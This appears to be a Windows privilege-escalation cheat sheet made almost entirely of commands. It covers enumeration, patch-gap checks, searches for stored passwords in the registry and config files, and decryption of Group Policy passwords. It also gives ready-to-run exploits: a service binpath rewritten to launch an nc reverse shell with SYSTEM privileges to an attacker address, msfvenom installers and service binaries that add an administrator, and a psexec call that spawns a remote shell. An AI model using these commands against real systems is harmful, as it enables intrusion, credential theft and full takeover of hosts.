Windows Priv Escalation
https://github.com/wwong99/windows-privilege-escalation
Windows
Enumeration
# basics
systeminfo
hostname
echo %username%
# users
net users
net user <username>
# network
ipconfig /all
route print
arp -A
netstat -ano # active network connections
# firewall status
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule all
# save the systeminfo output to a file and check it for missing patches / known vulnerabilities
https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt
# Check whether given patches (KB numbers) are installed
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
--------------------------------------
Kernel
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# check for possible kernel exploits; find a writable place to upload the exe (e.g. C:\Inetpub or C:\temp), then run it
--------------------------------------
Weak permissions
# this example is for XP SP0
# upload accesschk.exe to a writable directory first
# for XP, version 5.2 of accesschk.exe is needed
https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
# check for services with weak permissions
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# check the permissions of each service found above (here: upnphost)
accesschk.exe -ucqv upnphost
# upload nc.exe to writable directory
sc config upnphost binpath= "C:\Inetpub\nc.exe -nv <attackerip> 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
# check the status now
sc qc upnphost
# set the service start type to auto-start
sc config SSDPSRV start= auto
# start the services
net start SSDPSRV
net stop upnphost
net start upnphost
# listen on port 9988 and you'll get a shell with NT AUTHORITY\SYSTEM privileges
--------------------------------------
Registry Checks for Passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
--------------------------------------
Places to Check for Credentials
C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir /b /s vnc.ini
----------------------------
Groups.xml
# Look up the IP address of the DC
nslookup nameofserver.whatever.local
# It will output something like this
Address: 192.168.1.101
# Now we map the SYSVOL share to a drive letter
net use z: \\192.168.1.101\SYSVOL
# And enter it
z:
# Now we search for the groups.xml file
dir Groups.xml /s
# decrypt the password in it
gpp-decrypt <pass>
-----------------------------
AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
# In the output, check whether the "AlwaysInstallElevated" value is 1.
# Exploitation:
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi
Place 'setup.msi' in 'C:\Temp'
msiexec /quiet /qn /i C:\Temp\setup.msi
net localgroup Administrators
---------------------------------
Find writable files
dir /a-r-d /s /b
/a filters by attribute; a leading '-' negates, so -r excludes read-only entries and -d excludes directories (i.e. list writable files only)
/s means recurse subdirectories
/b means bare format. Path and filename only.
-----------------------------------
Unquoted Path
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
# Suppose we found: C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
# check the permissions on each folder along the service path
icacls "C:\Program Files (x86)\Program Folder"
# exploit
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
Place common.exe in 'C:\Program Files\Unquoted Path Service'.
# Open a command prompt and run:
sc start unquotedsrvc
net localgroup Administrators
-----------------------------------
# psexec using found credentials
# first upload nc.exe to a writable directory
psexec.exe -u <username> -p <password> \\MACHINENAME C:\Inetpub\nc.exe <attackerip> <attackerport> -e C:\windows\system32\cmd.exe